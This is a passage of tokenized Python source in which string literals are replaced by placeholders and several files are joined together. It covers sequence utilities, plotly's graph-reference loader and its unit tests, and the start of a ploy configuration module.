% type ( seq ) <EOL> raise DeviceError ( badtype ) <EOL> return list ( seq ) <EOL> def _as_before ( orig , lst ) : <EOL> return "<STR_LIT>" . join ( lst ) if isinstance ( orig , basestring ) else list ( lst ) <EOL> def _getter ( seq , names ) : <EOL> from operator import itemgetter , attrgetter <EOL> is_dotted = any ( [ '<STR_LIT:.>' in name for name in names ] ) <EOL> getter = attrgetter if is_dotted or hasattr ( seq [ <NUM_LIT:0> ] , names [ <NUM_LIT:0> ] ) else itemgetter <EOL> return getter ( * names ) <EOL> def order ( seq , * names , ** kwargs ) : <EOL> lst = _as_sequence ( seq ) <EOL> if not names or not seq : <EOL> reordered = [ ( it , idx ) for idx , it in enumerate ( lst ) ] <EOL> else : <EOL> getter = _getter ( lst , names ) <EOL> reordered = [ ( getter ( it ) , idx ) for idx , it in enumerate ( lst ) ] <EOL> reordered . sort ( ** kwargs ) <EOL> return [ it [ <NUM_LIT:1> ] for it in reordered ] <EOL> def ordered ( seq , * names , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> lst = _as_sequence ( seq ) <EOL> if kwargs . get ( '<STR_LIT>' ) and lst : <EOL> return _as_before ( seq , [ lst [ idx ] for idx in kwargs [ '<STR_LIT>' ] ] ) <EOL> if not names or not lst : <EOL> return _as_before ( seq , sorted ( lst , ** kwargs ) ) <EOL> return _as_before ( seq , sorted ( lst , key = _getter ( lst , names ) , ** kwargs ) ) <EOL> def shuffled ( seq ) : <EOL> """<STR_LIT>""" <EOL> lst = _as_sequence ( seq ) <EOL> shuffle ( lst ) <EOL> return _as_before ( seq , lst ) <EOL> def _copy_attr ( v ) : <EOL> if v is None : <EOL> return None <EOL> elif hasattr ( v , "<STR_LIT>" ) : <EOL> return v . copy ( ) <EOL> elif isinstance ( v , tuple ) : <EOL> if hasattr ( v , '<STR_LIT>' ) : <EOL> return v . _replace ( ) <EOL> return tuple ( v ) <EOL> elif isinstance ( v , list ) : <EOL> return list ( v ) <EOL> elif isinstance ( v , ( int , str , unicode , float , bool , long ) ) : <EOL> return v <EOL> else : <EOL> raise DeviceError , "<STR_LIT>" % v <EOL> def _copy_attrs ( source , target , attrs ) : <EOL> for attr in attrs : <EOL> try : <EOL> setattr ( target , attr , _copy_attr ( getattr ( source , attr ) ) ) <EOL> except AttributeError , e : <EOL> print "<STR_LIT>" % attr , hasattr ( source , attr ) , hasattr ( target , attr ) <EOL> raise e <EOL> def _flatten ( seq ) : <EOL> return sum ( ( [ x ] if not isinstance ( x , ( list , tuple ) ) else list ( x ) for x in seq ) , [ ] ) <EOL> def trim_zeroes ( func ) : <EOL> return lambda slf : re . sub ( r'<STR_LIT>' , '<STR_LIT>' , func ( slf ) ) <EOL> def numlike ( obj ) : <EOL> return hasattr ( obj , '<STR_LIT>' ) or hasattr ( obj , '<STR_LIT>' ) <EOL> class BetterRepr ( object ) : <EOL> def __repr__ ( self , indent = <NUM_LIT:2> ) : <EOL> result = '<STR_LIT>' % self . __class__ . __name__ <EOL> for k , v in self . iteritems ( ) : <EOL> if isinstance ( v , BetterRepr ) : <EOL> vStr = v . __repr__ ( indent + <NUM_LIT:2> ) <EOL> else : <EOL> vStr = v . __repr__ ( ) <EOL> result += "<STR_LIT:\n>" + '<STR_LIT:U+0020>' * indent + k . __repr__ ( ) + '<STR_LIT>' + vStr <EOL> if not result . endswith ( '<STR_LIT:{>' ) : <EOL> result += "<STR_LIT:\n>" <EOL> result += '<STR_LIT:}>' <EOL> return result <EOL> class odict ( BetterRepr , OrderedDict ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class ddict ( BetterRepr , defaultdict ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class adict ( BetterRepr , dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kw ) : <EOL> super ( adict , self ) . __init__ ( * args , ** kw ) <EOL> self . __initialised = True <EOL> def __getattr__ ( self , key ) : <EOL> try : <EOL> return self [ key ] <EOL> except KeyError , k : <EOL> raise AttributeError , k <EOL> def __setattr__ ( self , key , value ) : <EOL> if not self . __dict__ . has_key ( '<STR_LIT>' ) : <EOL> return dict . __setattr__ ( self , key , value ) <EOL> self [ key ] = value <EOL> def __delattr__ ( self , key ) : <EOL> try : <EOL> del self [ key ] <EOL> except KeyError , k : <EOL> raise AttributeError , k <EOL> @ contextmanager <EOL> def autorelease ( ) : <EOL> pool = NSAutoreleasePool . alloc ( ) . init ( ) <EOL> yield <EOL> del pool <EOL> def rsrc_path ( resource = None ) : <EOL> """<STR_LIT>""" <EOL> module_root = abspath ( dirname ( dirname ( __file__ ) ) ) <EOL> rsrc_root = join ( module_root , '<STR_LIT>' ) <EOL> if not exists ( rsrc_root ) : <EOL> from glob import glob <EOL> for pth in glob ( join ( module_root , '<STR_LIT>' ) ) : <EOL> rsrc_root = abspath ( pth ) <EOL> break <EOL> else : <EOL> notfound = "<STR_LIT>" <EOL> raise RuntimeError ( notfound ) <EOL> if resource : <EOL> return join ( rsrc_root , resource ) <EOL> return rsrc_root </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import hashlib <EOL> import json <EOL> import os <EOL> import re <EOL> from pkg_resources import resource_string <EOL> import requests <EOL> import six <EOL> from plotly import files , utils <EOL> GRAPH_REFERENCE_PATH = '<STR_LIT>' <EOL> GRAPH_REFERENCE_DOWNLOAD_TIMEOUT = <NUM_LIT:5> <EOL> _BACKWARDS_COMPAT_CLASS_NAMES = { <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : list } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT:bar>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT:data>' , '<STR_LIT>' : list } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : None , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } , <EOL> '<STR_LIT>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : dict } <EOL> } <EOL> def get_graph_reference ( ) : <EOL> """<STR_LIT>""" <EOL> default_config = files . FILE_CONTENT [ files . CONFIG_FILE ] <EOL> if files . check_file_permissions ( ) : <EOL> graph_reference = utils . load_json_dict ( files . GRAPH_REFERENCE_FILE ) <EOL> config = utils . load_json_dict ( files . CONFIG_FILE ) <EOL> plotly_api_domain = config . get ( '<STR_LIT>' , <EOL> default_config [ '<STR_LIT>' ] ) <EOL> else : <EOL> graph_reference = { } <EOL> plotly_api_domain = default_config [ '<STR_LIT>' ] <EOL> sha1 = hashlib . sha1 ( six . b ( str ( graph_reference ) ) ) . hexdigest ( ) <EOL> graph_reference_url = '<STR_LIT>' . format ( plotly_api_domain , <EOL> GRAPH_REFERENCE_PATH , sha1 ) <EOL> try : <EOL> response = requests . get ( graph_reference_url , <EOL> timeout = GRAPH_REFERENCE_DOWNLOAD_TIMEOUT ) <EOL> response . raise_for_status ( ) <EOL> except requests . exceptions . RequestException : <EOL> if not graph_reference : <EOL> path = os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> s = resource_string ( '<STR_LIT>' , path ) . decode ( '<STR_LIT:utf-8>' ) <EOL> graph_reference = json . loads ( s ) <EOL> else : <EOL> if six . PY3 : <EOL> content = str ( response . content , encoding = '<STR_LIT:utf-8>' ) <EOL> else : <EOL> content = response . content <EOL> data = json . loads ( content ) <EOL> if data [ '<STR_LIT>' ] : <EOL> graph_reference = data [ '<STR_LIT>' ] <EOL> return utils . decode_unicode ( graph_reference ) <EOL> def string_to_class_name ( string ) : <EOL> """<STR_LIT>""" <EOL> string = re . sub ( r'<STR_LIT>' , lambda m : m . group ( ) . title ( ) , string , count = <NUM_LIT:1> ) <EOL> string = re . sub ( r'<STR_LIT>' , lambda m : m . group ( ) [ <NUM_LIT:1> : ] . title ( ) , string ) <EOL> return str ( string ) <EOL> def object_name_to_class_name ( object_name ) : <EOL> """<STR_LIT>""" <EOL> if object_name in TRACE_NAMES : <EOL> return string_to_class_name ( object_name ) <EOL> if object_name in OBJECT_NAME_TO_CLASS_NAME : <EOL> return OBJECT_NAME_TO_CLASS_NAME [ object_name ] <EOL> if object_name in ARRAYS : <EOL> return '<STR_LIT:list>' <EOL> else : <EOL> return '<STR_LIT>' <EOL> def get_attributes_dicts ( object_name , parent_object_names = ( ) ) : <EOL> """<STR_LIT>""" <EOL> object_dict = OBJECTS [ object_name ] <EOL> additional_attributes = object_dict [ '<STR_LIT>' ] <EOL> attribute_paths = list ( object_dict [ '<STR_LIT>' ] ) <EOL> for parent_object_name in reversed ( parent_object_names ) : <EOL> if parent_object_name in ARRAYS : <EOL> continue <EOL> parent_object_dict = OBJECTS [ parent_object_name ] <EOL> parent_attribute_paths = parent_object_dict [ '<STR_LIT>' ] <EOL> for path in list ( attribute_paths ) : <EOL> if not _is_valid_sub_path ( path , parent_attribute_paths ) : <EOL> attribute_paths . remove ( path ) <EOL> attributes_dicts = { path : utils . get_by_path ( GRAPH_REFERENCE , path ) <EOL> for path in attribute_paths } <EOL> attributes_dicts [ '<STR_LIT>' ] = additional_attributes <EOL> return attributes_dicts <EOL> def get_valid_attributes ( object_name , parent_object_names = ( ) ) : <EOL> attributes = get_attributes_dicts ( object_name , parent_object_names ) <EOL> valid_attributes = set ( ) <EOL> for attributes_dict in attributes . values ( ) : <EOL> for key , val in attributes_dict . items ( ) : <EOL> if key not in GRAPH_REFERENCE [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> valid_attributes . add ( key ) <EOL> deprecated_attributes = attributes_dict . get ( '<STR_LIT>' , { } ) <EOL> for key , val in deprecated_attributes . items ( ) : <EOL> if key not in GRAPH_REFERENCE [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> valid_attributes . add ( key ) <EOL> return valid_attributes <EOL> def get_deprecated_attributes ( object_name , parent_object_names = ( ) ) : <EOL> attributes = get_attributes_dicts ( object_name , parent_object_names ) <EOL> deprecated_attributes = set ( ) <EOL> for attributes_dict in attributes . values ( ) : <EOL> deprecated_attributes_dict = attributes_dict . get ( '<STR_LIT>' , { } ) <EOL> for key , val in deprecated_attributes_dict . items ( ) : <EOL> if key not in GRAPH_REFERENCE [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> deprecated_attributes . add ( key ) <EOL> return deprecated_attributes <EOL> def get_subplot_attributes ( object_name , parent_object_names = ( ) ) : <EOL> attributes = get_attributes_dicts ( object_name , parent_object_names ) <EOL> subplot_attributes = set ( ) <EOL> for attributes_dict in attributes . values ( ) : <EOL> for key , val in attributes_dict . items ( ) : <EOL> if key not in GRAPH_REFERENCE [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> if isinstance ( val , dict ) and val . get ( '<STR_LIT>' ) : <EOL> subplot_attributes . add ( key ) <EOL> deprecated_attributes = attributes_dict . get ( '<STR_LIT>' , { } ) <EOL> for key , val in deprecated_attributes . items ( ) : <EOL> if key not in GRAPH_REFERENCE [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> if isinstance ( val , dict ) and val . get ( '<STR_LIT>' ) : <EOL> subplot_attributes . add ( key ) <EOL> return subplot_attributes <EOL> def attribute_path_to_object_names ( attribute_container_path ) : <EOL> """<STR_LIT>""" <EOL> object_names = [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in attribute_container_path : <EOL> for path_part in attribute_container_path : <EOL> if path_part in OBJECTS : <EOL> object_names . append ( path_part ) <EOL> if path_part in ARRAYS : <EOL> object_names . append ( path_part ) <EOL> object_names . append ( path_part [ : - <NUM_LIT:1> ] ) <EOL> elif '<STR_LIT>' in attribute_container_path : <EOL> object_names . append ( '<STR_LIT>' ) <EOL> start_index = attribute_container_path . index ( '<STR_LIT>' ) <EOL> for path_part in attribute_container_path [ start_index : ] : <EOL> if path_part in OBJECTS : <EOL> object_names . append ( path_part ) <EOL> if path_part in ARRAYS : <EOL> object_names . append ( path_part ) <EOL> object_names . append ( path_part [ : - <NUM_LIT:1> ] ) <EOL> else : <EOL> object_names . append ( '<STR_LIT:data>' ) <EOL> for path_part in attribute_container_path : <EOL> if path_part in OBJECTS : <EOL> object_names . append ( path_part ) <EOL> if path_part in ARRAYS : <EOL> object_names . append ( path_part ) <EOL> object_names . append ( path_part [ : - <NUM_LIT:1> ] ) <EOL> return tuple ( object_names ) <EOL> def get_role ( object_name , attribute , value = None , parent_object_names = ( ) ) : <EOL> """<STR_LIT>""" <EOL> if object_name in TRACE_NAMES and attribute == '<STR_LIT:type>' : <EOL> return '<STR_LIT:info>' <EOL> attributes_dicts = get_attributes_dicts ( object_name , parent_object_names ) <EOL> matches = [ ] <EOL> for attributes_dict in attributes_dicts . values ( ) : <EOL> for key , val in attributes_dict . items ( ) : <EOL> if key == attribute : <EOL> matches . append ( val ) <EOL> for key , val in attributes_dict . get ( '<STR_LIT>' , { } ) . items ( ) : <EOL> if key == attribute : <EOL> matches . append ( val ) <EOL> roles = [ ] <EOL> for match in matches : <EOL> role = match [ '<STR_LIT>' ] <EOL> array_ok = match . get ( '<STR_LIT>' ) <EOL> if value is not None and array_ok : <EOL> iterable = hasattr ( value , '<STR_LIT>' ) <EOL> stringy = isinstance ( value , six . string_types ) <EOL> dicty = isinstance ( value , dict ) <EOL> if iterable and not stringy and not dicty : <EOL> role = '<STR_LIT:data>' <EOL> roles . append ( role ) <EOL> if '<STR_LIT:data>' in roles : <EOL> role = '<STR_LIT:data>' <EOL> else : <EOL> role = roles [ <NUM_LIT:0> ] <EOL> return role <EOL> def _is_valid_sub_path ( path , parent_paths ) : <EOL> """<STR_LIT>""" <EOL> if not parent_paths : <EOL> return True <EOL> for parent_path in parent_paths : <EOL> if path [ : len ( parent_path ) ] == parent_path : <EOL> return True <EOL> return False <EOL> def _get_objects ( ) : <EOL> """<STR_LIT>""" <EOL> objects = { } <EOL> for node , path in utils . node_generator ( GRAPH_REFERENCE ) : <EOL> if any ( [ key in path for key in GRAPH_REFERENCE [ '<STR_LIT>' ] [ '<STR_LIT>' ] ] ) : <EOL> continue <EOL> if node . get ( '<STR_LIT>' ) != '<STR_LIT:object>' : <EOL> continue <EOL> if '<STR_LIT>' in node : <EOL> continue <EOL> object_name = path [ - <NUM_LIT:1> ] <EOL> if object_name not in objects : <EOL> objects [ object_name ] = { '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : { } } <EOL> if node . get ( '<STR_LIT>' ) : <EOL> objects [ object_name ] [ '<STR_LIT>' ] . append ( <EOL> path + ( '<STR_LIT>' , ) <EOL> ) <EOL> else : <EOL> objects [ object_name ] [ '<STR_LIT>' ] . append ( path ) <EOL> objects [ object_name ] [ '<STR_LIT>' ] . append ( path ) <EOL> return objects <EOL> def _patch_objects ( ) : <EOL> """<STR_LIT>""" <EOL> layout_attribute_paths = [ ] <EOL> for node , path in utils . node_generator ( GRAPH_REFERENCE ) : <EOL> if any ( [ key in path for key in GRAPH_REFERENCE [ '<STR_LIT>' ] [ '<STR_LIT>' ] ] ) : <EOL> continue <EOL> if path and path [ - <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> layout_attribute_paths . append ( path ) <EOL> for trace_name in TRACE_NAMES : <EOL> OBJECTS [ trace_name ] = { <EOL> '<STR_LIT>' : [ ( '<STR_LIT>' , trace_name ) ] , <EOL> '<STR_LIT>' : [ ( '<STR_LIT>' , trace_name , '<STR_LIT>' ) ] , <EOL> '<STR_LIT>' : { } <EOL> } <EOL> OBJECTS [ '<STR_LIT>' ] = { '<STR_LIT>' : [ ( '<STR_LIT>' , ) ] , <EOL> '<STR_LIT>' : layout_attribute_paths , <EOL> '<STR_LIT>' : { } } <EOL> figure_attributes = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:object>' } , <EOL> '<STR_LIT:data>' : { '<STR_LIT>' : '<STR_LIT:object>' , '<STR_LIT>' : True } } <EOL> OBJECTS [ '<STR_LIT>' ] = { '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : figure_attributes } <EOL> def _get_arrays ( ) : <EOL> """<STR_LIT>""" <EOL> arrays = { } <EOL> for node , path in utils . node_generator ( GRAPH_REFERENCE ) : <EOL> if any ( [ key in path for key in GRAPH_REFERENCE [ '<STR_LIT>' ] [ '<STR_LIT>' ] ] ) : <EOL> continue <EOL> if node . get ( '<STR_LIT>' ) != '<STR_LIT:object>' : <EOL> continue <EOL> if '<STR_LIT>' not in node : <EOL> continue <EOL> object_name = path [ - <NUM_LIT:1> ] <EOL> if object_name not in arrays : <EOL> items = node [ '<STR_LIT>' ] <EOL> if isinstance ( items , dict ) : <EOL> item_names = list ( items . keys ( ) ) <EOL> else : <EOL> item_names = [ object_name [ : - <NUM_LIT:1> ] ] <EOL> arrays [ object_name ] = { '<STR_LIT>' : [ path ] , '<STR_LIT>' : item_names } <EOL> return arrays <EOL> def _patch_arrays ( ) : <EOL> """<STR_LIT>""" <EOL> ARRAYS [ '<STR_LIT:data>' ] = { '<STR_LIT>' : [ ( '<STR_LIT>' , ) ] , '<STR_LIT>' : list ( TRACE_NAMES ) } <EOL> def _get_classes ( ) : <EOL> """<STR_LIT>""" <EOL> classes = { } <EOL> for class_name , class_dict in _BACKWARDS_COMPAT_CLASS_NAMES . items ( ) : <EOL> object_name = class_dict [ '<STR_LIT:object_name>' ] <EOL> base_type = class_dict [ '<STR_LIT>' ] <EOL> if object_name in OBJECTS or object_name in ARRAYS : <EOL> classes [ class_name ] = { '<STR_LIT:object_name>' : object_name , <EOL> '<STR_LIT>' : base_type } <EOL> else : <EOL> classes [ class_name ] = { '<STR_LIT:object_name>' : None , '<STR_LIT>' : base_type } <EOL> for object_name in TRACE_NAMES : <EOL> class_name = string_to_class_name ( object_name ) <EOL> classes [ class_name ] = { '<STR_LIT:object_name>' : object_name , '<STR_LIT>' : dict } <EOL> return classes <EOL> GRAPH_REFERENCE = get_graph_reference ( ) <EOL> TRACE_NAMES = list ( GRAPH_REFERENCE [ '<STR_LIT>' ] . keys ( ) ) <EOL> OBJECTS = _get_objects ( ) <EOL> _patch_objects ( ) <EOL> ARRAYS = _get_arrays ( ) <EOL> _patch_arrays ( ) <EOL> CLASSES = _get_classes ( ) <EOL> OBJECT_NAME_TO_CLASS_NAME = { class_dict [ '<STR_LIT:object_name>' ] : class_name <EOL> for class_name , class_dict in CLASSES . items ( ) <EOL> if class_dict [ '<STR_LIT:object_name>' ] is not None } </s>
<s> from unittest import TestCase <EOL> import plotly . graph_objs as go <EOL> import plotly . graph_reference as gr <EOL> OLD_CLASS_NAMES = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class TestBackwardsCompat ( TestCase ) : <EOL> def test_old_class_names ( self ) : <EOL> for class_name in OLD_CLASS_NAMES : <EOL> self . assertIn ( class_name , go . __dict__ . keys ( ) ) <EOL> class TestGraphObjs ( TestCase ) : <EOL> def test_traces_should_be_defined ( self ) : <EOL> class_names = [ gr . string_to_class_name ( object_name ) <EOL> for object_name in gr . TRACE_NAMES ] <EOL> for class_name in class_names : <EOL> self . assertIn ( class_name , go . __dict__ . keys ( ) ) <EOL> def test_no_new_classes ( self ) : <EOL> expected_class_names = { gr . string_to_class_name ( object_name ) <EOL> for object_name in gr . TRACE_NAMES } <EOL> expected_class_names . update ( OLD_CLASS_NAMES ) <EOL> current_class_names = { key for key in go . __dict__ . keys ( ) <EOL> if key [ <NUM_LIT:0> ] . isupper ( ) } <EOL> self . assertEqual ( current_class_names , expected_class_names ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from unittest import TestCase <EOL> from plotly . widgets import GraphWidget <EOL> class TestWidgets ( TestCase ) : <EOL> def test_instantiate_graph_widget ( self ) : <EOL> widget = GraphWidget </s>
<s> from ploy . common import Hooks <EOL> try : <EOL> from configparser import RawConfigParser <EOL> except ImportError : <EOL> from ConfigParser import RawConfigParser <EOL> try : <EOL> from collections import MutableMapping as DictMixin <EOL> except ImportError : <EOL> from UserDict import DictMixin <EOL> from weakref import proxy <EOL> import inspect <EOL> import logging <EOL> import os <EOL> import sys <EOL> import warnings <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> try : <EOL> unicode <EOL> except NameError : <EOL> unicode = str <EOL> _marker = object ( ) <EOL> def value_asbool ( value ) : <EOL> if isinstance ( value , bool ) : <EOL> return value <EOL> if value . lower ( ) in ( '<STR_LIT:true>' , '<STR_LIT:yes>' , '<STR_LIT>' ) : <EOL> return True <EOL> elif value . lower ( ) in ( '<STR_LIT:false>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return False <EOL> class BaseMassager ( object ) : <EOL> def __init__ ( self , sectiongroupname , key ) : <EOL> self . sectiongroupname = sectiongroupname <EOL> self . key = key <EOL> def path ( self , config , sectionname ) : <EOL> return config . get_path ( self . key ) <EOL> def __call__ ( self , config , sectionname ) : <EOL> value = config . _dict [ self . key ] <EOL> if isinstance ( value , ConfigValue ) : <EOL> return value . value <EOL> return value <EOL> class BooleanMassager ( BaseMassager ) : <EOL> def __call__ ( self , config , sectionname ) : <EOL> value = BaseMassager . __call__ ( self , config , sectionname ) <EOL> value = value_asbool ( value ) <EOL> if value is None : <EOL> raise ValueError ( "<STR_LIT>" % ( value , self . key , self . sectiongroupname , sectionname ) ) <EOL> return value <EOL> class IntegerMassager ( BaseMassager ) : <EOL> def __call__ ( self , config , sectionname ) : <EOL> value = BaseMassager . __call__ ( self , config , sectionname ) <EOL> return int ( value ) <EOL> def expand_path ( value , base ) : <EOL> value = os . path . expanduser ( value ) <EOL> if not os . path . isabs ( value ) : <EOL> value = os . path . join ( base , value ) <EOL> return os . path . normpath ( value ) <EOL> class PathMassager ( BaseMassager ) : <EOL> def __call__ ( self , config , sectionname ) : <EOL> value = BaseMassager . __call__ ( self , config , sectionname ) <EOL> return expand_path ( value , self . path ( config , sectionname ) ) <EOL> def resolve_dotted_name ( value ) : <EOL> if '<STR_LIT:.>' in value : <EOL> prefix , name = value . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> _temp = __import__ ( prefix , globals ( ) , locals ( ) , [ name ] ) <EOL> return getattr ( _temp , name ) <EOL> else : <EOL> return __import__ ( value , globals ( ) , locals ( ) , [ ] ) <EOL> class HooksMassager ( BaseMassager ) : <EOL> def __call__ ( self , config , sectionname ) : <EOL> value = BaseMassager . __call__ ( self , config , sectionname ) <EOL> hooks = Hooks ( ) <EOL> for hook_spec in value . split ( ) : <EOL> hooks . add ( resolve_dotted_name ( hook_spec ) ( ) ) <EOL> return hooks <EOL> class StartupScriptMassager ( BaseMassager ) : <EOL> def __call__ ( self , config , sectionname ) : <EOL> value = BaseMassager . __call__ ( self , config , sectionname ) <EOL> if not value : <EOL> return <EOL> result = dict ( ) <EOL> if value . startswith ( '<STR_LIT>' ) : <EOL> value = value [ <NUM_LIT:5> : ] <EOL> result [ '<STR_LIT>' ] = True <EOL> if not os . path . isabs ( value ) : <EOL> value = os . path . join ( self . path ( config , sectionname ) , value ) <EOL> result [ '<STR_LIT:path>' ] = value <EOL> return result <EOL> class UserMassager ( BaseMassager ) : <EOL> def __call__ ( self , config , sectionname ) : <EOL> value = BaseMassager . __call__ ( self , config , sectionname ) <EOL> if value == "<STR_LIT:*>" : <EOL> import pwd <EOL> value = pwd . getpwuid ( os . getuid ( ) ) [ <NUM_LIT:0> ] <EOL> return value <EOL> class ConfigValue ( object ) : <EOL> __slots__ = ( '<STR_LIT:path>' , '<STR_LIT:value>' , '<STR_LIT:src>' ) <EOL> def __init__ ( self , path , value , src = None ) : <EOL> self . path = path <EOL> self . value = value <EOL> self . src = src <EOL> def get_package_name ( module ) : <EOL> f = getattr ( module , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if ( ( '<STR_LIT>' in f ) or ( '<STR_LIT>' in f ) ) : <EOL> return module . __name__ <EOL> else : <EOL> return module . __name__ . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> def get_caller_src ( ) : <EOL> skip = frozenset ( [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> stop = frozenset ( [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> frame = sys . _getframe ( <NUM_LIT:2> ) <EOL> while frame . f_back is not None : <EOL> f_code = frame . f_code <EOL> lineno = frame . f_lineno <EOL> module_globals = frame . f_globals <EOL> frame = frame . f_back <EOL> module_name = module_globals . get ( '<STR_LIT>' ) or '<STR_LIT:__main__>' <EOL> if ( module_name , f_code . co_name ) in skip : <EOL> continue <EOL> if ( module_name , f_code . co_name ) in stop : <EOL> return <EOL> package_name = get_package_name ( sys . modules [ module_name ] ) <EOL> f = getattr ( sys . modules [ package_name ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> path = os . path . relpath ( f_code . co_filename , os . path . dirname ( f ) ) <EOL> return "<STR_LIT>" % ( package_name , path , lineno ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> class ConfigSection ( DictMixin ) : <EOL> def __init__ ( self , * args , ** kw ) : 